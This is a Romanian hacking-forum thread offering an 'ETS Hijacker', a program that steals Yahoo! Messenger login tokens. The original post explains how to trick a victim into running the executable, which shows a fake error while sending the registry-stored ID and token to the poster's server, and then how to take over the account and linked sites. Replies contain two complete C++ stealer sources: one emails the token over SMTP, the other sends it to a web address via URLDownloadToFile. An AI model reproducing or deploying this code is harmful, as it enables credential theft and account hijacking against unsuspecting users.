ETS Hijacker

February 6, 2009

Aceasta este, probabil, ce mai simpla metoda de a sparge un cont de messenger. Da-le dra**** de keyloggere... bindere... ftp-uri.. toate ca sa furi o parola...

Atunci cand te loghezi pe Yahoo! Messenger, ai optiunea de a salva id-ul si parola, pentru logari ulterioare. ID-ul se salveaza in registri, si se mai salveaza un cod, ETS, in care se memoreaza token-ul de autentificare. Din token nu se poate extrage parola.

Ce inseamna asta? Daca extragi cele 2 informatii din registri, iar apoi le "plantezi" pe alt calculator, ai sa ai surpriza ca te poti loga cu id-ul si parola salvata, deci pe contul altcuiva, fara sa ii afli neaparat si parola.

Simplu, nu?

Am facut cu C++ un exe de dimensiuni mici, pe care il gasiti arhivat aici. Cand este lansat in executie, el extrage id-ul si ETS-ul, si le trimite pe un server. Cateva explicatii pe engleza, mai gasiti aici.

Dati exe-ul la cineva, si il convingeti sa il deschida. Programul va afisa un mesaj fals de eroare. Intrati pe http://it.octopis.com/ets.php, scrieti id-ul, si vedeti daca operatia a avut succes. Daca da, se va afisa id-ul si codul ETS. Click pe id, ca sa descarcati un fisier .REG, pe care il executati. Deschideti messenger-ul si surpriza!! Te-ai logat pe acel id! Ai acces la tot contul de Yahoo! + ca din moment ce ai acces la contul de e-mail, poti sa ii spargi conturile de pe hi5 / netlog / tagged (+ inca alte porcarii de saituri)...

SPOR LA FURAT!

Programul e mic si este bazat pe un principiu foarte simplu, iar sursa o tin sub cheie, pentru cei curiosi.

Saitul it.octopis.com e saitul meu, asa ca nu strica sa azvarliti o privire. Am pus 3-4 programele si mi-e o lene... sa mai adaug cateva.

Edited February 6, 2009 by chri5ty

Hertz · February 6, 2009

Daca nu ne arati si sursa nu esti TRU.

MostWanteD · February 6, 2009

interesanta treaba..da tu practic ai acces la toate id`urile de acolo ...

fLr^ · February 7, 2009

foarte interesanta treaba, si merge foarte bine. l-am testat

s33us00n · February 7, 2009

and unless you make your own you'll be labelled a script kiddie

Sharcky · February 7, 2009

chri5ty only 17 ani?:OOEsti dat dreq la varsta asta!!

February 8, 2009

Daca nu ne arati si sursa nu esti TRU.

Am explicat detaliat ce face. Rasfoiti registrii, ca nu va cade mana. Localizati cele 2 chei, si scrieti-va si singuri codul. Mie mi-a incaput tot pe 15 linii. :rolleyes:Poate am sa pun sursa. Ideea era sa se gandeasca fiecare cum se face, fiindca vine un 'Copy/Paste' si adauga fragmentul de cod la programul lui, apoi il lauda ca fiind nush ce unealta a lui de hacking, un trojan "ni-no-ni-no", absolut spectaculos, insa programul de fata e "pur si simplu prea simplu".

interesanta treaba..da tu practic ai acces la toate id`urile de acolo ...

Exact. Pe pagina pe care dai search, eu am cativa parametri secreti, prin care vad lista de ID-uri. Cand aveam 10-20 de intrari, ma mai uitam prin ele, iar uneori am vazut ca apartin unor persoane care nu merita sa incaseze 'palme' de la un mucos de cativa ani care s-a gandit sa ii sparga contul. De cand am 50 de bucati, chiar nu ma mai intereseaza sa ma incerc fiecare ID.

and unless you make your own you'll be labelled a script kiddie

La ce te referi, mai exact?

chri5ty only 17 ani?:OOEsti dat dreq la varsta asta!!

16.5 ani, multumesc.. Am incaput din clasa a 5-a cu HTMl-ul, cu Pascal dintr-a 6-a, iar cu C-ul dintr-a 7-a. In clasa a 9-a, in vacanta de vara, adica vara trecuta, am invatat C++ pana la perfectie. :cool:

zaiet-pagadi · February 8, 2009

Ok frumos program


Activez deep freeze sau vmware il execut fara conexiune la internet extrag executabilul MVC++ dupa instalare il decompilez si hopa codu sursa...big deal pt. cei care vor sursa...incearca si fa-l in pascal, delphi si esti "tatic"

Intrebarea este urmatoarea daca victima il executa fara conexiune la net ce se intampla?Este

stocat" fisierul de log cu datele de logare undeva pe hdd si cand "vede" o bucata de net trimite datele?

Edited February 8, 2009 by zaiet-pagadi

Rebell · February 8, 2009

Mai ai oleaca si ajungi la Microsoft :))

tine-o tot asa

February 8, 2009

Ok frumos program
Activez deep freeze sau vmware il execut fara conexiune la internet extrag 
executabilul MVC++ dupa instalare il decompilez si hopa codu sursa...big deal 
pt. cei care vor sursa...incearca si fa-l in pascal, delphi si esti "tatic"
Intrebarea este urmatoarea daca victima il executa fara conexiune la net ce se intampla?Este
stocat" fisierul de log cu datele de logare undeva pe hdd si cand "vede" o bucata de net trimite datele?

La ce iti trebuie deep freeze?(haha) E un executabil microscopic si iti garantez eu ca face ceea ce spune. Daca nu e conexiune la net, nu se stocheaza nimic. Nu m-a interesat deloc aspectul asta.

Si nu cred ca il poti decompila. Poate doar daca il dezasamblezi. Si chiar si asa, nu faci decat sa imi demonstrezi ca iti lipseste o tona de creativitate. E foarte simplu, ce naiba! Ma adresez programatorilor cu un nivel sub-mediu, sau macar mediu.

vfather · February 8, 2009

e super simplu, in AutoIT l-am scris in 3 linii de cod.

Ethereal · February 8, 2009

 #include <fstream>
#include <iostream>
#include <cstdlib>
#include <windows.h>
using namespace std;
char data[1000];
char bufferout[1000];
char bufferin[1000];
char ip[100];
char mail[100];
int port;
SOCKET asock, bsock;
    SOCKADDR_IN sina, sinb;
    WSADATA wsadata;

int checkKey(HKEY tree, const char *folder, char *key) {
	long lRet;
	HKEY hKey;
	char temp[150];
	DWORD dwBufLen;

	// Open location
	lRet = RegOpenKeyEx( tree, folder, 0, KEY_QUERY_VALUE, &hKey );
	if (lRet != ERROR_SUCCESS)
		return 0;

	// Get key
	dwBufLen = sizeof(temp);
	lRet = RegQueryValueEx( hKey, key, NULL, NULL, (BYTE*)&temp, &dwBufLen );
	if (lRet != ERROR_SUCCESS)
		return 0;
 strcpy(data+strlen(data), temp);
 data[strlen(data)]=' ';


	// Close key
	lRet = RegCloseKey( hKey );
	if (lRet != ERROR_SUCCESS)
		return 0;

	// Got this far, then key exists
	return 1;
}
int errorcheck(){ 
    if(bufferin[0]=='2'&&bufferin[1]=='2'&&bufferin[2]=='0'){ return 1;}
    if(bufferin[0]=='2'&&bufferin[1]=='5'&&bufferin[2]=='0') return 1;
    if(bufferin[0]=='4'&&bufferin[1]=='2'&&bufferin[2]=='1') return 0;
    return 1;
    }



int main()
{    mail[0]='<';
    strcpy(mail+1, "mailto@yahoo.com");
   mail[strlen(mail)+2]='\0';
    mail[strlen(mail)+1]='\n';
    mail[strlen(mail)]='>';
     for(int i=0; i<sizeof(data); i++) data[i]='\0';
    checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "ETS");
    checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "Yahoo! User ID");

    login:
      strcpy(ip,"67.195.168.31"); port=25;
 WSAStartup(0x101,&wsadata);
 bsock=socket(AF_INET, SOCK_STREAM, 0);

    sinb.sin_family=AF_INET;
    sinb.sin_addr.s_addr=inet_addr(ip);
    sinb.sin_port=htons(port);    
   connect( bsock, (SOCKADDR*) &sinb, sizeof(SOCKADDR_IN) );
    recv( bsock, bufferin, sizeof(bufferin), 0);
    cout<<bufferin;
    Sleep(200); cout<<"\n";
    if(!errorcheck()) { cout<<"restart"; WSACleanup(); goto login; }

    else cout<<"Connected.\n";           
   Sleep(30);     
    //FROM

     strcpy(bufferout, "MAIL FROM: <ethereal@yahoo.com>\n");
     cout<<"\n\n"<<bufferout<<" "<<strlen(bufferout)<<"\n\n";

      send(bsock, bufferout, strlen(bufferout),0);   
         recv( bsock, bufferin, sizeof(bufferin), 0);
         cout<<bufferin;

     //RCPT TO
     strcpy(bufferout, "RCPT TO: ");
     strcpy(bufferout+strlen(bufferout), mail);
   cout<<bufferout;
   send(bsock, bufferout, strlen(bufferout),0);
   recv( bsock, bufferin, sizeof(bufferin), 0);
   cout<<bufferin;
  // DATA
  strcpy(bufferout, "DATA\n");
     send(bsock, bufferout, strlen(bufferout),0);
     recv( bsock, bufferin, sizeof(bufferin), 0);
   cout<<bufferin;
   Sleep(30);
   strcpy(bufferout, "FROM:ethereal@yahoo.com\n \nSubject: Token stealer\n\n\n");
   strcpy(bufferout+strlen(bufferout), data);
   strcpy(bufferout+strlen(bufferout),"\n\0");
   send(bsock, bufferout, strlen(bufferout),0);

   strcpy(bufferout, "\r\n.\r\n");
    send(bsock, bufferout, strlen(bufferout),0);
   recv( bsock, bufferin, sizeof(bufferin), 0);
    cout<<bufferin;
    strcpy(bufferout,"quit\n");
    send(bsock, bufferout, strlen(bufferout),0);

    cout<<"\nEnd of the world.";

    cin.get();






    }

zaiet-pagadi · February 8, 2009

La ce iti trebuie deep freeze?(haha) E un executabil microscopic si iti garantez eu ca face ceea ce spune. Daca nu e conexiune la net, nu se stocheaza nimic. Nu m-a interesat deloc aspectul asta.
Si nu cred ca il poti decompila. Poate doar daca il dezasamblezi. Si chiar si asa, nu faci decat sa imi demonstrezi ca iti lipseste o tona de creativitate. E foarte simplu, ce naiba! Ma adresez programatorilor cu un nivel sub-mediu, sau macar mediu.

Editat...

hai sa nu imi bat capul...incearca sa tii cont si de sfatul altora ca nu vei avea de pierdut

Edited February 8, 2009 by zaiet-pagadi

February 9, 2009

Eu am trimis parametrii prin URLDownloadToFile. URL-ul e un script php din sait + parametri, iar fisierul destinatie e nespecificat.

@zaiet-pagadi - Nu inteleg, ce vrei sa zici?

Hellbound · February 9, 2009

eu am intrat in el da nick nu a aparut pe pagina aia

February 10, 2009

eu am intrat in el da nick nu a aparut pe pagina aia

Adica cum? Ce nu iti apare?

Daca voiai sa zici ca ai dat search si nu ai gasit nimic pe ID-ul respectiv, atunci e posibil ca persoana careia i-ai dat programul sa foloseasca multi-mess, caz in care nu a bifat "remember my id and password".

Hellbound · February 10, 2009

Te rog mult poti sa specifici sursa ?

#include <fstream>
#include <iostream>
#include <cstdlib>
#include <windows.h>
using namespace std;
char data[1000];
char bufferout[1000];
char bufferin[1000];
char ip[100];
char mail[100];
int port;
SOCKET asock, bsock;
    SOCKADDR_IN sina, sinb;
    WSADATA wsadata;

int checkKey(HKEY tree, const char *folder, char *key) {
	long lRet;
	HKEY hKey;
	char temp[150];
	DWORD dwBufLen;

	// Open location
	lRet = RegOpenKeyEx( tree, folder, 0, KEY_QUERY_VALUE, &hKey );
	if (lRet != ERROR_SUCCESS)
		return 0;

	// Get key
	dwBufLen = sizeof(temp);
	lRet = RegQueryValueEx( hKey, key, NULL, NULL, (BYTE*)&temp, &dwBufLen );
	if (lRet != ERROR_SUCCESS)
		return 0;
 strcpy(data+strlen(data), temp);
 data[strlen(data)]=' ';


	// Close key
	lRet = RegCloseKey( hKey );
	if (lRet != ERROR_SUCCESS)
		return 0;

	// Got this far, then key exists
	return 1;
}
int errorcheck(){ 
    if(bufferin[0]=='2'&&bufferin[1]=='2'&&bufferin[2]=='0'){ return 1;}
    if(bufferin[0]=='2'&&bufferin[1]=='5'&&bufferin[2]=='0') return 1;
    if(bufferin[0]=='4'&&bufferin[1]=='2'&&bufferin[2]=='1') return 0;
    return 1;
    }



int main()
{    mail[0]='<';
    strcpy(mail+1, "mailto@yahoo.com");
   mail[strlen(mail)+2]='\0';
    mail[strlen(mail)+1]='\n';
    mail[strlen(mail)]='>';
     for(int i=0; i<sizeof(data); i++) data[i]='\0';
    checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "ETS");
    checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "Yahoo! User ID");

    login:
      strcpy(ip,"67.195.168.31"); port=25;
 WSAStartup(0x101,&wsadata);
 bsock=socket(AF_INET, SOCK_STREAM, 0);

    sinb.sin_family=AF_INET;
    sinb.sin_addr.s_addr=inet_addr(ip);
    sinb.sin_port=htons(port);    
   connect( bsock, (SOCKADDR*) &sinb, sizeof(SOCKADDR_IN) );
    recv( bsock, bufferin, sizeof(bufferin), 0);
    cout<<bufferin;
    Sleep(200); cout<<"\n";
    if(!errorcheck()) { cout<<"restart"; WSACleanup(); goto login; }

    else cout<<"Connected.\n";           
   Sleep(30);     
    //FROM

     strcpy(bufferout, "MAIL FROM: <ethereal@yahoo.com>\n");
     cout<<"\n\n"<<bufferout<<" "<<strlen(bufferout)<<"\n\n";

      send(bsock, bufferout, strlen(bufferout),0);   
         recv( bsock, bufferin, sizeof(bufferin), 0);
         cout<<bufferin;

     //RCPT TO
     strcpy(bufferout, "RCPT TO: ");
     strcpy(bufferout+strlen(bufferout), mail);
   cout<<bufferout;
   send(bsock, bufferout, strlen(bufferout),0);
   recv( bsock, bufferin, sizeof(bufferin), 0);
   cout<<bufferin;
  // DATA
  strcpy(bufferout, "DATA\n");
     send(bsock, bufferout, strlen(bufferout),0);
     recv( bsock, bufferin, sizeof(bufferin), 0);
   cout<<bufferin;
   Sleep(30);
   strcpy(bufferout, "FROM:ethereal@yahoo.com\n \nSubject: Token stealer\n\n\n");
   strcpy(bufferout+strlen(bufferout), data);
   strcpy(bufferout+strlen(bufferout),"\n\0");
   send(bsock, bufferout, strlen(bufferout),0);

   strcpy(bufferout, "\r\n.\r\n");
    send(bsock, bufferout, strlen(bufferout),0);
   recv( bsock, bufferin, sizeof(bufferin), 0);
    cout<<bufferin;
    strcpy(bufferout,"quit\n");
    send(bsock, bufferout, strlen(bufferout),0);

    cout<<"\nEnd of the world.";

    cin.get();






    }

Daca asta e zimi cum o compilezi autoit , c++ ? sau te rog mult sa imi dai sursa as vrea sa imi fac si eu un aseamenea site

February 11, 2009

#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"Urlmon.lib")
void getKey(LPCSTR Path,LPCSTR Key,void*buffer){
HKEY key;unsigned long type=REG_SZ, size=1024;
if (RegOpenKeyEx(HKEY_CURRENT_USER,Path,0,KEY_READ,&key)!=ERROR_SUCCESS)return;
RegQueryValueEx(key,
Key,
NULL,
&type,
(LPBYTE)buffer,
&size);
RegCloseKey(key);
}
int WinMain(HINSTANCE,HINSTANCE,LPCSTR,int){
char buf[1024]="";
char URL[1024]="****************";
getKey("Software\\yahoo\\pager","Yahoo! User ID",URL+strlen(URL));
getKey("Software\\yahoo\\pager","ETS",buf);
strcat(URL,"********");
strcat(URL,buf);
if(strlen(buf)){
URLDownloadToFile(0,URL,"",0,0);
MessageBox(0,"Application failed to initialize","Fatal Error",MB_ICONSTOP);
}else MessageBox(0,"Unexpected error in main module","Fatal Error",MB_ICONSTOP);
return 0;
}

Am ascuns sub *** cativa parametri, ca sa nu se floodeze baza de date. Exista o parola pentru ca intrarile sa fie acceptate.

Hellbound · February 11, 2009

Te rog poti sa ma faci sa inteleg

Eu acest script il compilez cu c ++ ? sa obtin executabilu ?

si unde modific in script sa imi pun pagina de verificare cum ai facut tu

Poti face un tut sau daca asa dami add la worldextremehack@yahoo.com

Ovvi · February 11, 2009

am si eu o intrebare ... daca o persoana a accesat acel program... si o alta persoana ii foloseste mailu... cum poate scapa persoana care e victima ? reinstal windows ? ... sau?

Hellbound · February 11, 2009

Schimbandu-si parola !

Hai t rog chri5ty explicami ce te-am rugat ...

February 12, 2009

Inlocuiesti ****** cu niste fragmente de URL, astfel incat, in final, sa se obtina un URL de forma "http://sait.com/cale/script.php?parametru=valoare&parametru=valoare...."

E mai simplu decat pare, dar nu am sa evidentiez parametrii pe forum, ca sa nu poate nimeni sa umfle automat baza de date cu mii de intrari fara sens. Scriptul php e la fel de simplu ca si programul.

Chiar se face prea multa discutie pe tema asta. Trebuia sa va dau doar ideea, iar voi, singuri, sa va faceti programele proprii.

Hellbound · February 12, 2009

Te rog eu frumos da-mi add la id vreau sa vorbim putin te rog eu cristi worldextremehack@yahoo.com

fLr^ · February 18, 2009

nu mai merge programul

Clyde · February 20, 2009

Virus: HEUR/Malware

Type: AHeAD Heuristic special detection

In the wild: No

Reported Infections: Low

Distribution Potential: Low

Damage Potential: Low

Static file: No

Description:

HEUR/Malware

HEUR/Malware is a heuristic detection routine designed to detect common malware characteristics. Avira AntiVir recognizes unknown malware proactively using its AHeAD technology. To achieve this, Avira performs innovative structural analyzing.

On the basis of the composition of a file, the sequence of significant code sequences or based on particular behavior patterns, the heuristics can determine with a high probability whether it is dealing with a harmful or virulent file.

HEUR/Malware in particular is reported when a program seems to contain suspicious functionality.

In the unlikely occurrence of a false positives we would kindly ask for your help and send the file to our virus lab using the quarantine functionality of AntiVir.

A heuristic detection might be a false identification if one or more of the following are true:

- The program has been used for a very long time and is known to the user

- The program was installed by the user himself

- The program is from a trustworthy source

Please note that even old programs can get infected or replaced by malware without your knowledge. Besides that trustworthy sources might have become compromised themselves.

In order to enhance detection and reduce the rate of false positives we recommend you to send the file to our virus lab for further analysis.

Sign In

ETS Hijacker

Recommended Posts

Guest chri5ty

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest chri5ty

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest chri5ty

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest chri5ty

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest chri5ty

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest chri5ty

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest chri5ty

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation